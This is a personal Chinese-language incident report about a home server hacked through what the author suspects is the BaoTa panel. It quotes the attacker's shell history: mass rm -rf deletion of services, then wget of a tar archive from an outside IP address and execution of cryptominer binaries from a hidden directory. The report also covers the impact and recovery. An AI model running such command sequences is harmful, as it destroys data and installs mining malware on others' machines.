服务崩溃报告

8月中旬，我在学校尝试远程回家的时候发现出了点意外，没想到是出了点大问题啊，简单记录一下

在以后有什么大规模的崩溃也会记录在这里（但愿不要再写下去

2024/8

在8月15日下午1点，家里ikuai-kvm节点被入侵，执行到的相关命令如下

338  free
339  top
340  ps aux
341  apt remove sendmail* docker* container*
342  ps aux
343  cd /home
344  ls
345  rm -rf *
346  cd /
347  ls
348  rm -rf www
349  cd /etc/systemd/system
350  ls
351  ps aux
352  ls
353  rm -rf cloud* db* ddn* nez* mcsm*
354  ls
355  cd multi*
356  ls
357  rm -rf cloud* db* ddn* nez* mcsm*
358  ls
359  rm -rf cont* docker* tail* x-ui*
360  cd /usr/local
361  ls
362  rm -rf x*
363  rm -rf bt*
364  cd
365  ls
366  w
367  rm -rf *
368  reboot
369  free
370  ps aux
371  ls
372  netstat -lntu
373  ping 8.8.8.8
374  yum install msr-tools
375  apt install msr-tools
376  apt autoremove
377  ls
378  nproc
379  mkdir .sys
380  cd .sys
381  wget http://54.71.19.189:8088/x.tar
382  tar xzvf x.tar
383  ./hash
384  ./s
385  exit

后面就是挖矿病毒了，不是哥们你挖矿就挖矿，你还删我东西啊。他甚至名称都不舍得给我打全，用通配符来替代

image-20240831161032128

我当时在学校临时将路由后台映射切换到另一台服务器下，进到后台后看到路由器cpu温度有70多度，我就知道事情不简单

Snipaste_2024-08-30_21-43-29

在Aug 16, 5:34 AM GMT+8时完全下线

影响范围：图片分发节点，mc服务器官网，图床，Gitea，大量私有服务（无法统计）

补充：由于由于图床需要将远程云盘目录映射到本地，同时我也测试镜像站在该服务器的部署，导致在执行清删除操作时同步清除了云盘中挂载的所有内容，合计1405个文件，已恢复

image-20240831161146700

分析：包是宝塔了，我另一台在香港的服务器之前用宝塔直接被菠菜网站修改好几回nginx配置，现在三台服务器就这一台还是用着宝塔没有迁移了，里面的服务大多是docker虚拟化的，直接部署的也都是开源的程序，基本不会引进病毒，唯一可能的后门最严重的只剩下这个宝塔了。作为对比啊，我内网下另一台服务器用的是1panel，一点事没有。

灾难恢复：由于并没有妥善的统计内网下的服务，因此想完整恢复有点困难，但主要业务相关端口均有记录在tailscale，可以起一定参考作用